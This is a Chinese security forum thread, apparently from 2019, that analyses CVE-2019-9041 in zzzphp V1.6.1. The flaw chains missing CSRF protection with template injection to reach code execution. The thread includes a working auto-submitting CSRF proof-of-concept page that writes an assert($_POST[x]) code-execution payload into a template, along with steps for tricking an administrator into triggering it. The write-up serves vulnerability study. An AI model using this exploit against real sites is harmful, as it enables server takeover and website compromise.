查看: 25711|回复: 2

CVE-2019-9041 CSRF到Getshell漏洞

[复制链接]
  • TA的每日心情
    慵懒
    2019-12-9 20:45
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2019-7-9 01:37:06 | 显示全部楼层 |阅读模式
    本帖最后由 90_ 于 2019-7-10 10:34 编辑

    前言
    无意中看到vulnhub新放了一个Csrf大礼包,集合多个最新的csrf to getshell的cve!所以拿这个系统做一个系列关于Csrf的代码审计之路!今天的cms是zzzphp,漏洞并不是特别复杂,算是开个头吧!
    正文
    审计的zzzphp系统版本为V1.6.1,首先是一个csrf漏洞,这个漏洞原因在于整个后台没有csrf token保护,导致存在csrf漏洞,所以可以伪造客户端请求!再配合CVE-2019-9041即可getshell!
    首先我们使用Burp Suite生成一个CSRF POC
    1.png
    修改如下:
    [HTML] 纯文本查看 复制代码
    <html>  <!-- [color=rgb(0, 136, 204)][backcolor=transparent]CSRF[/backcolor][/color] PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>​    <form action="http://192.168.1.64/zzzphp/admin015/save.php?act=editfile" method="POST">​      <input type="hidden" name="file" value="/zzzphp/template/pc/cn2016/html/search.html" />​      <input type="hidden" name="filetext" value="{if:assert($_;POST[x])}phpinfo();{end if}" />​      <input type="submit" value="Submit request" />​    </form>​    <script>​      document.forms[0].submit();​    </script>​  </body>​</html>
    其中生效的payload为html编码的{if:assert($_POST[x])}phpinfo();{end if}。我们把这个poc保存为html文件,在管理员登陆的状态下,诱导管理员点击包含poc的链接,即可在search.html模版中插入恶意代码!
    利用过程
    csrf诱导点击链接
    管理员点击后操作为后台的模版管理 -> 电脑模版 -> cn2016(6) -> html -> search.html 编辑
    在模版中添加{if:assert($_POST[x])}xxx;{end if} 保存
    代码执行

    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2019-12-9 20:45
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2019-7-9 01:37:34 | 显示全部楼层
    怎么还有变成表情操作///

    点评

    90_
    学会用代码编辑器  详情 回复 发表于 2019-7-10 10:35
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2019-7-10 10:35:23 | 显示全部楼层

    RE: CVE-2019-9041 CSRF到Getshell漏洞

    danko 发表于 2019-7-9 01:37
    怎么还有变成表情操作///

    学会用代码编辑器
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-22 16:22 , Processed in 0.026678 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部